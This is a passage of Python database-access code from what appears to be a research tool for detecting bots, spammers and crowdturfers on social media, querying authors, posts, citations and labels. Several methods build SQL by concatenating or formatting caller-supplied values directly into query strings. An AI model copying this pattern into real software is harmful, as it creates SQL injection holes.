random_authors_for_graphs ON (random_authors_for_graphs.author_guid = author_topic_mapping.author_guid)\n \"\"\"\n result = self.session.execute(query, params=dict(domain=domain, min_posts_count=min_posts_count))\n cursor = result.cursor\n author_topics_vectors = self.result_iter(cursor)\n\n author_guid_topics_vector = self._create_author_guid_topics_vector(author_topics_vectors)\n return author_guid_topics_vector\n\n def _create_author_guid_topics_vector(self, author_topics_vectors):\n author_guid_topics_vector = {}\n for author_topics_vector in author_topics_vectors:\n author_guid = author_topics_vector[0]\n author_topic_vector = author_topics_vector[1:-1]\n\n author_guid_topics_vector[author_guid] = author_topic_vector\n return author_guid_topics_vector\n\n def create_author_guid_num_of_posts_view(self):\n self.session.execute(\"DROP VIEW IF EXISTS author_guid_num_of_posts_view;\")\n query = \"\"\"\n CREATE VIEW author_guid_num_of_posts_view as\n SELECT posts.author_guid, posts.domain, COUNT(*) as num_of_posts\n FROM posts\n GROUP BY 1,2\n HAVING num_of_posts >= 1\n ORDER BY 3 DESC\n \"\"\"\n query = text(query)\n self.session.execute(query)\n self.session.commit()\n\n def get_posts_count_per_author(self, domain):\n query = text(\"SELECT authors.author_guid, COUNT(posts.post_id) \"\n \"FROM authors \"\n 
\"INNER JOIN posts ON (authors.author_guid = posts.author_guid) \"\n \"WHERE authors.domain = :domain and authors.author_osn_id IS NOT NULL \"\n \"GROUP BY authors.author_guid\")\n\n result = self.session.execute(query, params=dict(domain=domain))\n cursor = result.cursor\n records = list(cursor.fetchall())\n return {record[0]: record[1] for record in records}\n\n #############################################################\n ###### Co-Citations View\n #############################################################\n def get_cocitations(self, min_number_of_cocited_posts):\n query = \" SELECT a1.author_guid, a2.author_guid, count(a1.post_id_to) AS weight \\\n FROM author_post_cite a1 \\\n INNER JOIN author_post_cite a2 ON (a1.post_id_to = a2.post_id_to) \\\n WHERE a1.author_guid <> a2.author_guid \\\n GROUP BY a1.author_guid, a2.author_guid \\\n HAVING weight >= :min_number_of_cocited_posts \"\n\n print('starting get_cocitations query execution')\n result = self.session.execute(query, params=dict(min_number_of_cocited_posts=min_number_of_cocited_posts))\n print('passed get_cocitations query execution')\n\n cursor = result.cursor\n print('starting get_cocitations cursor fetchall')\n rows = self.result_iter(cursor)\n print('passed get_cocitations cursor fetchall')\n return rows\n\n ###########################################################\n ####### Citations View\n ###########################################################\n def get_citations(self, domain):\n query = \" SELECT p_from.author_guid AS from_author_guid, p_to.author_guid AS to_author_guid, count(*) AS num_citations \\\n FROM post_citations AS p_cit \\\n INNER JOIN posts AS p_from ON (p_cit.post_id_from = p_from.post_id) \\\n INNER JOIN posts AS p_to ON (p_cit.post_id_to = p_to.post_id) \\\n WHERE p_from.domain = :domain \\\n AND p_to.domain = :domain \\\n GROUP BY from_author_guid, to_author_guid \"\n\n print('starting get_citations query execution')\n result = self.session.execute(query, params=dict(domain=domain))\n print('passed get_citations query execution')\n\n cursor = result.cursor\n print('starting get_citations cursor fetchall')\n rows = list(cursor.fetchall())\n print('passed get_citations cursor fetchall')\n return rows\n\n def get_random_author_guid_post_id_dictionary(self):\n query = \"\"\"\n SELECT posts.author_guid, posts.post_id\n FROM posts\n INNER JOIN random_authors_for_graphs on random_authors_for_graphs.author_guid = posts.author_guid\n \"\"\"\n return self._create_dictionary_by_query(query)\n\n def _create_dictionary_by_query(self, query):\n query = text(query)\n result = self.session.execute(query)\n cursor = result.cursor\n records = self.result_iter(cursor)\n records = list(records)\n return {record[0]: record[1] for record in records}\n\n def get_post_id_random_author_guid_dictionary(self):\n\n query = \"\"\"\n SELECT posts.post_id, posts.author_guid\n FROM posts\n INNER JOIN random_authors_for_graphs on random_authors_for_graphs.author_guid = posts.author_guid\n \"\"\"\n return self._create_dictionary_by_query(query)\n\n ###########################################################\n # post representativeness\n ###########################################################\n def load_posts_representativeness_table(self):\n ufitf_data = self.get_ufitf_data()\n self.session.add_all(ufitf_data)\n self.session.commit()\n\n def create_posts_representativeness_entry(self, ufitf_value):\n return Posts_representativeness(\n post_id=format(list(ufitf_value.values())[0]),\n 
topic_id=int(list(ufitf_value.values())[1]),\n url=format(list(ufitf_value.values())[2]),\n how_many_times_cited_in_topic=int(list(ufitf_value.values())[3]),\n in_how_many_topics=int(list(ufitf_value.values())[4]),\n post_count=int(list(ufitf_value.values())[5]),\n tfidf=float(list(ufitf_value.values())[6]),\n tof=int(list(ufitf_value.values())[7]),\n )\n\n def get_ufitf_data(self):\n q = text(\n \"select post_id, topic_id, url_to, how_many_times_cited_in_topic, in_how_many_topics, post_count, ufitf1, tof from tfidf\")\n res = self.session.execute(q)\n return [self.create_posts_representativeness_entry(r) for r in res]\n\n def get_already_crawled_author_ids(self):\n query = \"SELECT DISTINCT authors.author_osn_id \" \\\n \"FROM authors \" \\\n \"WHERE authors.author_osn_id IS NOT NULL \" \\\n \"AND authors.missing_data_complementor_insertion_date IS NOT NULL\"\n query = text(query)\n result = self.session.execute(query)\n cursor = result.cursor\n ids = list(cursor.fetchall())\n already_crawled_author_ids = [r[0] for r in ids]\n return already_crawled_author_ids\n\n def get_bad_actor_retweeters_not_retrieved_from_vico(self):\n logging.info(\"get_bad_actor_retweeters_not_retrieved_from_vico\")\n\n query = \"SELECT authors.author_osn_id \" \\\n \"FROM authors \" \\\n \"INNER JOIN post_retweeter_connections on (authors.author_osn_id = post_retweeter_connections.retweeter_twitter_id) \" \\\n \"WHERE authors.xml_importer_insertion_date IS NULL \" \\\n \"AND authors.protected = 0 \" \\\n \"AND authors.author_type = 'bad_actor'\"\n\n query = text(query)\n result = self.session.execute(query)\n cursor = result.cursor\n ids = list(cursor.fetchall())\n twitter_authors_ids = [r[0] for r in ids]\n logging.info(\"Number of bad actor retweeters not retrieved from vico is: \" + str(len(twitter_authors_ids)))\n return twitter_authors_ids\n\n def get_bad_actors_retweets_retrieved_by_vico(self):\n logging.info(\"get_bad_actors_retweets_retrieved_by_vico\")\n\n results = self.session.query(Post).filter(or_(Post.content.like(\"%RT @annakiril3%\"),\n Post.content.like(\"%RT @LeviAvavilevi%\"),\n Post.content.like(\"%RT @benny_metanya%\"),\n Post.content.like(\"%RT @meggiewill5%\"),\n Post.content.like(\"%RT @amira_buzavgo%\"),\n Post.content.like(\"%RT @TAringthon%\"))).all()\n\n return results\n\n def get_bad_actor_tweets_from_vico(self):\n logging.info(\"get_bad_actor_tweets_from_vico\")\n '''\n SELECT *\n FROM posts\n WHERE (posts.content LIKE '%Youtube apps joins free Online TV channel in United kingdom%'\n OR posts.content LIKE '%Watch Internet TV, and Online TV for free!!%'\n OR posts.content LIKE '%Smart TV - all what we need to know!%'\n OR posts.content LIKE '%How to Stream Web Videos & Live TV to a Samsung Smart TV%'\n OR posts.content LIKE '%Free Internet TV - A Complete Guide For Canadians%'\n OR posts.content LIKE '%Smart TV vs. Media Streamer%' )\n AND posts.content NOT LIKE '%RT @%'\n '''\n\n results = self.session.query(Post).filter(\n or_(Post.content.like('%Youtube apps joins free Online TV channel in United kingdom%'),\n Post.content.like('%Watch Internet TV, and Online TV for free!!%'),\n Post.content.like('%Smart TV - all what we need to know!%'),\n Post.content.like('%How to Stream Web Videos & Live TV to a Samsung Smart TV%'),\n Post.content.like('%Free Internet TV - A Complete Guide For Canadians%'),\n Post.content.like('%Smart TV vs. 
Media Streamer%')),\n and_(not_(Post.content.like('%RT @%')))).all()\n\n return results\n\n def get_missing_authors_guid_not_marked_as_bad_actors(self, targeted_twitter_author_screen_names):\n #\n # This function retrieves all the authors who retweeted our posts and are not marked as bad actors\n #\n\n logging.info(\"get_missing_authors_guid_not_marked_as_bad_actors\")\n\n query = \"SELECT authors.author_guid \" \\\n \"FROM authors \" \\\n \"INNER JOIN posts ON (authors.author_guid = posts.author_guid) \" \\\n \"WHERE (posts.content LIKE '%RT @annakiril3%' \" \\\n \"OR posts.content LIKE '%RT @LeviAvavilevi%' \" \\\n \"OR posts.content LIKE '%RT @benny_metanya%' \" \\\n \"OR posts.content LIKE '%RT @meggiewill5%' \" \\\n \"OR posts.content LIKE '%RT @amira_buzavgo%' \" \\\n \"OR posts.content LIKE '%RT @TAringthon%') \" \\\n \"AND authors.author_type IS NOT 'bad_actor'\"\n\n query = text(query)\n result = self.session.execute(query)\n cursor = result.cursor\n twitter_author_guids = list(cursor.fetchall())\n author_guids = [r[0] for r in twitter_author_guids]\n logging.info(\"Number of missing bad actors that were not marked is: \" + str(len(author_guids)))\n return author_guids\n\n def delete_acquired_authors(self):\n logging.info(\"delete_acquired_authors\")\n query = 'DELETE ' \\\n 'FROM authors ' \\\n 'WHERE authors.author_type = \"bad_actor\" ' \\\n 'AND (authors.author_sub_type = \"crowdturfer\" ' \\\n 'OR authors.author_sub_type IS NULL ' \\\n 'OR authors.author_sub_type = \"acquired\")'\n query = text(query)\n self.session.execute(query)\n self.session.commit()\n\n def delete_manually_labeled_authors(self):\n logging.info(\"delete_manually_labeled_authors\")\n query = 'DELETE ' \\\n 'FROM authors ' \\\n 'WHERE (authors.author_type = \"bad_actor\" OR authors.author_type = \"good_actor\")'\n query = text(query)\n self.session.execute(query)\n self.session.commit()\n\n def delete_posts_with_missing_authors(self):\n logging.info(\"delete_posts_with_missing_authors\")\n query = ' DELETE ' \\\n ' FROM posts' \\\n ' WHERE (posts.author_guid NOT IN( ' \\\n ' SELECT authors.author_guid' \\\n ' FROM authors) ' \\\n ' OR posts.author_guid IS NULL) '\n query = text(query)\n self.session.execute(query)\n self.session.commit()\n\n def get_posts_of_missing_authors(self):\n\n results = self.session.query(Post).filter(Post.author_guid == None).all()\n return results\n\n def get_missing_authors_tuples(self):\n query = ' SELECT DISTINCT(posts.author_guid), posts.author' \\\n ' FROM posts' \\\n ' WHERE (posts.author_guid NOT IN( ' \\\n ' SELECT authors.author_guid' \\\n ' FROM authors) ' \\\n ' OR posts.author_guid IS NULL) '\n\n result = self.session.execute(query)\n cursor = result.cursor\n tuples = self.result_iter(cursor)\n return tuples\n\n def get_author_screen_name_last_post_id(self):\n query = '''\n SELECT a.author_screen_name, p.post_osn_id, MIN(p.date) \n FROM authors a, posts p\n WHERE a.author_guid = p.author_guid\n GROUP BY a.author_guid\n '''\n query = text(query)\n result = self.session.execute(query)\n cursor = result.cursor\n author_screen_names_post_ids = list(cursor.fetchall())\n # return cursor\n return self._get_author_screen_name_tweet_id_dict(author_screen_names_post_ids)\n\n def get_author_screen_name_first_post_id(self):\n query = '''\n SELECT a.author_screen_name, p.post_osn_id, MAX(p.date) \n FROM authors a, posts p\n WHERE a.author_guid = p.author_guid\n GROUP BY a.author_guid\n '''\n query = text(query)\n result = self.session.execute(query)\n cursor = result.cursor\n 
author_screen_names_post_ids = list(cursor.fetchall())\n # return cursor\n return self._get_author_screen_name_tweet_id_dict(author_screen_names_post_ids)\n\n def _get_author_screen_name_tweet_id_dict(self, author_screen_names_post_ids):\n author_screen_name_tweet_id = {}\n for author_screen_name, post_osn_id, date in author_screen_names_post_ids:\n author_screen_name_tweet_id[author_screen_name] = post_osn_id\n return author_screen_name_tweet_id\n\n def get_author_screen_names_and_number_of_posts(self, num_of_minimal_posts):\n\n logging.info(\"get_author_screen_names_for_timelines\")\n\n query = \"SELECT authors.author_screen_name, COUNT(authors.author_guid) \" \\\n \"FROM authors \" \\\n \"INNER JOIN posts ON(authors.author_guid = posts.author_guid) \" \\\n \"WHERE authors.domain = 'Microblog' \" \\\n \"AND authors.author_osn_id IS NOT NULL \" \\\n \"AND authors.protected = 0 \" \\\n \"AND authors.timeline_overlap_insertion_date IS NULL \" \\\n \"GROUP BY authors.author_guid \" \\\n \"HAVING COUNT(authors.author_guid) < :num_of_minimal_posts\"\n\n query = text(query)\n result = self.session.execute(query, params=dict(num_of_minimal_posts=num_of_minimal_posts))\n cursor = result.cursor\n # return cursor\n osn_author_screen_names_and_number_of_posts = list(cursor.fetchall())\n return osn_author_screen_names_and_number_of_posts\n\n def assign_manually_labeled_authors(self):\n self.assign_private_profiles()\n self.assign_company_profiles()\n self.assign_bot_profiles()\n self.assign_news_feed_profiles()\n self.assign_spammer_profiles()\n\n def assign_private_profiles(self):\n logging.info(\"assign_private_profiles\")\n sql_script = open('DB/scripts/assign_private_profiles.txt', 'r')\n query = sql_script.read()\n query = text(query)\n self.session.execute(query)\n self.session.commit()\n\n def assign_company_profiles(self):\n logging.info(\"assign_company_profiles\")\n sql_script = open('DB/scripts/assign_company_profiles.txt', 'r')\n query = sql_script.read()\n query = text(query)\n self.session.execute(query)\n self.session.commit()\n\n def assign_news_feed_profiles(self):\n logging.info(\"assign_news_feed_profiles\")\n sql_script = open('DB/scripts/assign_news_feed_profiles.txt', 'r')\n query = sql_script.read()\n query = text(query)\n self.session.execute(query)\n self.session.commit()\n\n def assign_spammer_profiles(self):\n logging.info(\"assign_spammer_profiles\")\n sql_script = open('DB/scripts/assign_spammer_profiles.txt', 'r')\n query = sql_script.read()\n query = text(query)\n self.session.execute(query)\n self.session.commit()\n\n def assign_bot_profiles(self):\n logging.info(\"assign_bot_profiles\")\n sql_script = open('DB/scripts/assign_bot_profiles.txt', 'r')\n query = sql_script.read()\n query = text(query)\n self.session.execute(query)\n self.session.commit()\n\n def assign_crowdturfer_profiles(self):\n logging.info(\"assign_crowdturfer_profiles\")\n sql_script = open('DB/scripts/assign_crowdturfer_profiles.txt', 'r')\n query = sql_script.read()\n query = text(query)\n self.session.execute(query)\n self.session.commit()\n\n def assign_acquired_profiles(self):\n logging.info(\"assign_acquired_profiles\")\n sql_script = open('DB/scripts/assign_acquired_profiles.txt', 'r')\n query = sql_script.read()\n query = text(query)\n self.session.execute(query)\n self.session.commit()\n\n def get_all_acquired_crowdturfer_authors(self):\n logging.info(\"get_all_acquired_crowdturfer_authors\")\n query = 'SELECT * ' \\\n 'FROM authors ' \\\n 'WHERE (authors.author_type = \"bad_actor\" ' \\\n 
'AND (authors.author_sub_type = \"acquired\" OR authors.author_sub_type = \"crowdturfer\" OR authors.author_sub_type IS NULL));'\n query = text(query)\n result = self.session.execute(query)\n cursor = result.cursor\n data = list(cursor.fetchall())\n authors = [row[0] for row in data]\n return authors\n\n def get_all_manually_labeled_bad_actors(self):\n logging.info(\"get_all_manually_labeled_bad_actors\")\n query = 'SELECT * ' \\\n 'FROM authors ' \\\n 'WHERE (authors.author_type = \"bad_actor\" ' \\\n 'AND authors.author_sub_type IS NOT NULL);'\n query = text(query)\n result = self.session.execute(query)\n cursor = result.cursor\n data = list(cursor.fetchall())\n authors = [row[0] for row in data]\n return authors\n\n def get_all_unlabeled_authors(self):\n logging.info(\"get_all_unlabeled_authors\")\n query = \"SELECT * \" \\\n \"FROM authors \" \\\n \"WHERE authors.author_type IS NULL \" \\\n \"AND authors.domain = 'Microblog'\"\n\n query = text(query)\n result = self.session.execute(query)\n cursor = result.cursor\n data = list(cursor.fetchall())\n authors = [row[0] for row in data]\n return authors\n\n def update_bad_actor_from_timeline_overlaping(self, potential_bad_actors):\n logging.info(\"update_bad_actor_from_timeline_overlaping\")\n query = 'UPDATE authors ' \\\n 'SET author_type = \"bad_actor\", author_sub_type = \"acquired\", timeline_overlap_insertion_date = :insertion_date ' \\\n 'WHERE authors.name IN ' + \"('\" + \"','\".join(map(str, potential_bad_actors)) + \"')\"\n query = text(query)\n date = str(get_current_time_as_string())\n self.session.execute(query, params=dict(insertion_date=date))\n self.session.commit()\n\n def update_authors_type_by_author_names(self, authors_name, author_type):\n logging.info(\"update_authors_type_by_author_names\")\n query = 'UPDATE authors ' \\\n 'SET author_type = :author_type ' \\\n 'WHERE authors.name IN ' + \"('\" + \"','\".join(map(str, authors_name)) + \"')\"\n query = text(query)\n self.session.execute(query, params=dict(author_type=author_type))\n self.session.commit()\n\n def create_authors_index(self):\n logging.info(\"create_authors_index\")\n query = \"CREATE INDEX IF NOT EXISTS idx_authors \" \\\n \"ON authors (domain, author_osn_id)\"\n\n query = text(query)\n self.session.execute(query)\n self.session.commit()\n\n def create_posts_index(self):\n logging.info(\"create_authors_index\")\n query = \"CREATE INDEX IF NOT EXISTS idx_posts \" \\\n \"ON posts (author_guid)\"\n\n query = text(query)\n self.session.execute(query)\n self.session.commit()\n\n def get_words_with_highest_probability(self):\n query = \"select * \" \\\n \"from topic_terms_view \" \\\n \"order by topic_id asc,probability desc ;\"\n query = text(query)\n result = self.session.execute(query)\n cursor = result.cursor\n data = list(cursor.fetchall())\n result = {}\n current_topic = str(data[0][0])\n get_from_topic = 0\n for row in data:\n\n if str(row[0]) != current_topic:\n get_from_topic = 0\n current_topic = str(row[0])\n\n if current_topic not in result:\n result[current_topic] = []\n\n if str(row[0]) == current_topic and get_from_topic <= 10:\n get_from_topic += 1\n result[current_topic].append((row[1], row[2]))\n\n return result\n\n def get_author_timelines_by_min_num_of_posts(self, domain, min_num_of_posts):\n query = \"\"\"\n select\n a.author_guid,\n p.content,\n a.author_type\n from authors as a\n inner join posts as p on (a.author_guid = p.author_guid)\n where a.domain= :domain\n and a.author_guid in ( select\n posts.author_guid\n from posts\n where 
domain = :domain\n group by posts.author_guid\n having count(posts.author_guid) >= :min_num_of_posts)\n \"\"\"\n query = text(query)\n\n result = self.session.execute(query, params=dict(domain=domain, min_num_of_posts=min_num_of_posts))\n cursor = result.cursor\n tuples = self.result_iter(cursor)\n return tuples\n\n def get_author_connections_by_connection_type(self, connection_type):\n query = \"\"\"\n SELECT author_connections.source_author_guid, author_connections.destination_author_guid, author_connections.weight\n FROM author_connections\n WHERE author_connections.connection_type = :connection_type\n \"\"\"\n query = text(query)\n\n result = self.session.execute(query, params=dict(connection_type=connection_type))\n cursor = result.cursor\n generator = self.result_iter(cursor)\n return generator\n\n def get_labeled_authors_by_domain(self, domain, targeted_class_field_name):\n query = \"\"\"\n SELECT authors.author_guid, authors.{}\n FROM authors\n WHERE authors.domain = :domain\n AND authors.author_type IS NOT NULL\n \"\"\".format(targeted_class_field_name)\n query = text(query)\n\n result = self.session.execute(query, params=dict(domain=domain))\n cursor = result.cursor\n generator = self.result_iter(cursor)\n return generator\n\n def get_labeled_author_connections_by_connection_type(self, connection_type):\n query = \"\"\"\n SELECT author_connections.source_author_guid, author_connections.destination_author_guid, author_connections.weight\n FROM author_connections\n INNER JOIN authors as a1 ON (a1.author_guid = author_connections.source_author_guid)\n INNER JOIN authors as a2 ON (a2.author_guid = author_connections.destination_author_guid )\n WHERE author_connections.connection_type = :connection_type\n AND a1.author_type IS NOT NULL\n AND a2.author_type IS NOT NULL\n \"\"\"\n query = text(query)\n\n result = self.session.execute(query, params=dict(connection_type=connection_type))\n cursor = result.cursor\n generator = self.result_iter(cursor)\n return generator\n\n def get_labeled_bad_actors_timelines_temp(self):\n query = \"\"\" select\n a.name,\n p.content,\n a.author_sub_type\n from\n authors as a\n inner join\n posts as p on (a.author_guid = p.author_guid)\n where\n a.domain= 'Microblog'\n and (a.author_type = 'bad_actor' or a.author_type = 'good_actor')\n and a.author_sub_type in ('bot','spammer','crowdturfer','acquired','news_feed','private','company' )\n and a.author_guid in ( select\n posts.author_guid\n from posts\n where domain = 'Microblog'\n group by posts.author_guid\n having count(posts.author_guid) >= 100)\n \"\"\"\n query = text(query)\n\n result = self.session.execute(query)\n cursor = result.cursor\n\n return cursor\n\n def get_authors_and_tweets_ids_from_temporal_table(self):\n '''\n :return: a list of Twitter status ids\n '''\n\n q = \" select post_id, author_id from ( \"\n for i in range(3, 203):\n q += \"select field\" + str(i) + \" as post_id, twitter_id as author_id from honeypot where field\" + str(\n i) + \" is not null \\n \"\n if i < 202:\n q += \" union \"\n q += \") \\n \"\n q += \" where post_id not in (select post_osn_id from posts) \" \\\n \" and post_id not in (select tweet_id from deleted_tweets) \" \\\n \" and author_id not in (select author_osn_id from authors where protected = 1 or is_suspended_or_not_exists = 1)\"\n query = text(q)\n result = self.session.execute(query)\n cursor = result.cursor\n records = list(cursor.fetchall())\n result = []\n for rec in records:\n result.append((rec[0], rec[1]))\n\n return result\n\n def 
save_author_features(self, authors_features):\n print('\\n Beginning merging author_features objects')\n counter = 0\n if authors_features:\n for author_features_row in authors_features:\n counter += 1\n self.update_author_features(author_features_row)\n if counter == 100:\n print(\"\\r \" + \"merging author-features objects\", end=\"\")\n self.commit()\n counter = 0\n if counter != 0:\n self.commit()\n print('Finished merging author_features objects')\n\n def create_topic_terms_view(self):\n print(\"create_topic_terms_view \")\n query = \"\"\"\n create view IF NOT EXISTS topic_terms_view as\n\t\t select topic_id, t2.description, probability\n from topics t1 inner join terms t2 on t1.term_id = t2.term_id\n \"\"\"\n query = text(query)\n self.session.execute(query)\n self.session.commit()\n\n def get_cooperated_authors(self, targeted_twitter_author_names, domain):\n query = \"\"\"\n SELECT DISTINCT authors.author_guid\n FROM authors\n INNER JOIN posts ON (authors.author_guid = posts.author_guid)\n WHERE authors.domain = :domain\n AND authors.author_type IS NOT 'bad_actor'\n AND ( \"\"\"\n\n targeted_twitter_authors_count = len(targeted_twitter_author_names)\n query += \"posts.content LIKE '%RT @\" + targeted_twitter_author_names[0] + \"%' \"\n\n for i in range(1, targeted_twitter_authors_count):\n query += \"OR posts.content LIKE '%RT @\" + targeted_twitter_author_names[i] + \"%' \"\n\n query += \")\"\n\n query = text(query)\n\n result = self.session.execute(query, params=dict(domain=domain))\n cursor = result.cursor\n\n return cursor\n\n def create_post_topic_mapping_post_id_index(self):\n logging.info(\"create_post_topic_mapping_post_id_index\")\n query = \"CREATE INDEX IF NOT EXISTS create_post_topic_mapping_post_id_index \" \\\n \"ON post_topic_mapping (post_id)\"\n query = text(query)\n self.session.execute(query)\n self.session.commit()\n\n def create_posts_post_id_index(self):\n logging.info(\"create_posts_post_id_index\")\n query = \"CREATE INDEX IF NOT EXISTS create_posts_post_id_index \" \\\n \"ON posts (post_id)\"\n query = text(query)\n self.session.execute(query)\n self.session.commit()\n\n def get_unlabeled_predictions(self):\n query = \"\"\"\n SELECT unlabeled_predictions.AccountPropertiesFeatureGenerator_author_screen_name,\n unlabeled_predictions.predicted,\n unlabeled_predictions.prediction\n FROM unlabeled_predictions\n \"\"\"\n query = text(query)\n\n result = self.session.execute(query)\n cursor = result.cursor\n\n return cursor\n\n def drop_unlabeled_predictions(self, predictions_table_name):\n query = \"DROP TABLE IF EXISTS \" + predictions_table_name + \";\"\n query = text(query)\n self.session.execute(query)\n self.session.commit()\n\n ###########################################################\n ####### Get distance features\n ###########################################################\n\n def get_distance_features(self):\n query = \" SELECT author_guid \\\n FROM author_features \\\n WHERE attribute_name like '%min_dist_to%' \\\n or attribute_name like '%mean_dist_to%' \"\n\n result = self.session.execute(query)\n cursor = result.cursor\n rows = list(cursor.fetchall())\n return rows\n\n def insert_or_update_authors_from_posts(self, domain, author_classify_dict, author_prop_dict):\n authors_to_update = []\n posts = self.session.query(Post).filter(Post.domain == domain).all()\n author_dict = self.get_author_dictionary()\n logging.info(\"Insert or update_authors from app importer\")\n logging.info(\"total Posts: \" + str(len(posts)))\n i = 1\n for post in posts:\n msg = \"\\r Insert or update posts: [{}\".format(i) + \"/\" + str(len(posts)) + ']'\n print(msg, end=\"\")\n i += 1\n author_guid = post.author_guid\n if 
author_guid in author_dict:\n continue\n\n # domain = post.domain\n\n # if not self.is_author_exists(author_guid, domain):\n author = Author()\n author_name = post.author\n author.name = author_name\n author.author_screen_name = post.author\n author.domain = post.domain\n author.author_guid = author_guid\n\n if author_name in author_classify_dict:\n author.author_type = author_classify_dict[author_name]\n\n post_type = post.post_type\n if post_type is not None:\n targeted_classes = post_type.split('/')\n author_sub_type = targeted_classes[0]\n if author_sub_type is not None:\n author.author_sub_type = author_sub_type\n\n if author_guid in author_prop_dict:\n for key, value in author_prop_dict[author_guid].items():\n setattr(author, key, value)\n\n authors_to_update.append(author)\n author_dict[author_guid] = author\n\n if len(posts) != 0: print(\"\")\n # self.add_authors(authors_to_update)\n self.session.bulk_save_objects(authors_to_update)\n self.session.commit()\n\n def get_posts_filtered_by_domain(self, domain):\n entries = self.session.query(Post).filter(Post.domain == domain).all()\n return entries\n\n def get_instagram_posts_without_comments(self):\n connection_type = 'post_comment_connection'\n query = text(\"\"\"\n SELECT *\n FROM posts\n WHERE posts.post_type = 'post'\n AND posts.domain = 'Instagram'\n AND posts.retweet_count > 0\n AND posts.post_id NOT IN (SELECT source_author_guid\n FROM author_connections\n WHERE connection_type = :connection_type)\n \"\"\")\n\n result = self.session.execute(query, params=dict(connection_type=connection_type))\n posts_dicts = list(map(dict, result))\n posts = [Post(**post_dict) for post_dict in posts_dicts]\n return posts\n\n def get_author_guids(self):\n result = self.session.query(Author.author_guid).all()\n ids = [res[0] for res in result]\n return ids\n\n def delete_anchor_authors(self):\n query = \"\"\"\n DELETE\n FROM anchor_authors\n \"\"\"\n query = text(query)\n self.session.execute(query)\n self.commit()\n\n def insert_anchor_author(self, author_guid, author_type):\n anchor_author = AnchorAuthor(author_guid, author_type)\n self.session.merge(anchor_author)\n self.session.commit()\n\n def get_anchor_authors(self):\n query = \"\"\" SELECT author_guid, author_type\n FROM anchor_authors \"\"\"\n query = text(query)\n result = self.session.execute(query)\n cursor = result.cursor\n return cursor\n\n def get_random_authors_for_graphs(self):\n query = \"\"\"\n SELECT author_guid, author_type\n FROM random_authors_for_graphs\n \"\"\"\n query = text(query)\n result = self.session.execute(query)\n cursor = result.cursor\n random_authors_for_graphs = self.result_iter(cursor)\n return random_authors_for_graphs\n\n # def get_author_types(self, domain):\n # author_type = {}\n # query = \"SELECT author_guid, author_type FROM authors where author_guid is not null and domain={0}\".format(domain)\n # query = text(query)\n # result = self.session.execute(query)\n # authors = self.result_iter(result.cursor)\n # for author in authors:\n # author_type[author[0]]=author[1]\n # return author_type\n\n def create_author_dictionaries(self, index_field_for_predictions, domain):\n labeled_author_dict = {}\n unlabeled_author_dict = {}\n # author_guid - author_screen_name\n unlabeled_author_guid_index_field_dict = {}\n query = \"SELECT author_guid, {0}, author_type FROM authors where author_guid is not null and domain='{1}'\".format(\n index_field_for_predictions, domain)\n # query = \"\"\"\n # SELECT author_guid, author_type FROM authors where author_guid is not 
null and domain = '\" +domain + \"'\n # \"\"\"\n query = text(query)\n result = self.session.execute(query)\n authors = self.result_iter(result.cursor)\n for author in authors:\n author_guid = author[0]\n index_field_for_predictions = author[1]\n targeted_class = author[2]\n\n if targeted_class is not None:\n labeled_author_dict[author_guid] = targeted_class\n print(\"{0} - {1}\".format(author_guid, targeted_class))\n else:\n unlabeled_author_dict[author_guid] = targeted_class\n unlabeled_author_guid_index_field_dict[author_guid] = index_field_for_predictions\n return labeled_author_dict, unlabeled_author_dict, unlabeled_author_guid_index_field_dict\n\n def get_author_guid_by_targeted_field_name_and_targeted_class(self, targeted_field_name, targeted_class):\n query = \"SELECT authors.author_guid FROM authors WHERE authors\"\n query += \".\" + targeted_field_name + \" = \" + \"'\" + targeted_class + \"'\"\n\n query = text(query)\n result = self.session.execute(query)\n cursor = result.cursor\n return cursor\n\n def create_author_feature(self, author_guid, attribute_name, attribute_value):\n author_feature = AuthorFeatures()\n\n author_feature.author_guid = author_guid\n author_feature.attribute_name = attribute_name\n author_feature.attribute_value = str(attribute_value)\n author_feature.window_start = self._window_start\n author_feature.window_end = self._window_end\n\n msg = '\\r adding ' + 'author_guid:' + author_guid + ' attribute_name: ' + attribute_name + ' attribute_value: ' + str(\n attribute_value)\n print(msg, end=\"\")\n\n return author_feature\n\n def delete_anchor_author_features(self):\n query = \"\"\"\n DELETE\n FROM author_features\n WHERE author_features.author_guid IN (\n\t SELECT anchor_authors.author_guid\n\t FROM anchor_authors\n )\n \"\"\"\n query = text(query)\n self.session.execute(query)\n self.commit()\n\n def create_temp_author_connections(self, source_author_id, destination_author_ids, author_connection_type,\n insertion_date):\n print(\"---create_temp_author_connections---\")\n author_connections = []\n for destination_author_id in destination_author_ids:\n author_connection = self.create_temp_author_connection(source_author_id, destination_author_id,\n author_connection_type, insertion_date)\n author_connections.append(author_connection)\n\n return author_connections\n\n def create_temp_author_connection(self, source_author_id, destination_author_id, connection_type, insertion_date):\n temp_author_connection = TempAuthorConnection()\n msg = '\\r \"Temp author connection: source -> ' + str(source_author_id) + ', dest -> ' + str(\n destination_author_id) + ', connection type = ' + connection_type\n print(msg, end=\"\")\n # print(\"Temp author connection: source -> \" + str(source_author_id) + \", dest -> \" + str(\n # destination_author_id) + \", connection type = \" + connection_type)\n temp_author_connection.source_author_osn_id = source_author_id\n temp_author_connection.destination_author_osn_id = destination_author_id\n temp_author_connection.connection_type = str(connection_type)\n temp_author_connection.insertion_date = insertion_date\n\n return temp_author_connection\n\n def get_temp_author_connections(self):\n query = \"\"\"\n SELECT temp_author_connections.source_author_osn_id, temp_author_connections.destination_author_osn_id,\n temp_author_connections.connection_type, temp_author_connections.insertion_date\n FROM temp_author_connections\n \"\"\"\n query = text(query)\n result = self.session.execute(query)\n cursor = result.cursor\n return cursor\n\n 
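# Added commentary (not part of the original code): create_temp_author_connections() only builds\n # TempAuthorConnection objects and returns them; callers persist them, and\n # convert_temp_author_connections_to_author_connections() below resolves the OSN ids to author\n # guids, saves the resulting author connections, and deletes the temp rows it converted.\n # Hypothetical usage, where dao is an instance of this class:\n # temp = dao.create_temp_author_connections('111', ['222', '333'], 'follower', insertion_date)\n # dao.convert_temp_author_connections_to_author_connections('Microblog')\n\n 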
